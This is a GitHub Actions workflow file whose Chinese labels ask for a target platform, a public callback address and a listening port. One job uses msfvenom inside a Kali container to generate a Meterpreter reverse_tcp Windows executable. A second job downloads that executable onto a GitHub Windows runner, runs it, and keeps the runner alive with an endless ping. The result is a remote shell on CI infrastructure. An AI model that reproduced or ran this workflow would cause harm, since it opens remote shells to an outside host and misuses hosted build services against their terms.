name: 牛逼666

on:
  workflow_dispatch:
    inputs:
      platform:
        description: '选择目标平台'
        required: true
        default: 'windows'
        type: choice
        options:
          - windows
          - linux
          - android
      lhost:
        description: '输入你的公网地址'
        required: true
        default: '192.168.1.100'
      lport:
        description: '输入监听端口'
        required: true
        default: '4444'
      


jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Generate Payload using Kali Docker
        run: |
          docker pull kalilinux/kali-rolling

          # 运行容器并生成 Payload
          docker run --rm \
            -v "${PWD}:/output" \
            -u root \
            kalilinux/kali-rolling \
            bash -c "apt-get update && \
                     apt-get install -y metasploit-framework && \
                     msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=${{ github.event.inputs.lhost }} LPORT=${{ github.event.inputs.lport }} -f exe -o /output/reverse.exe" 
      
      - name: Upload Payload
        uses: actions/upload-artifact@v4
        with:
          name: gp
          # 拼接路径和文件名
          path: reverse.exe
  cnct:
    runs-on: windows-latest
    needs: build
    steps:
      - name: dl
        uses: actions/download-artifact@v7.0.0
        with:
          name: gp
          path: g
      - name: run
        run: |
          .\g\reverse.exe
          ping -t 127.0.0.1
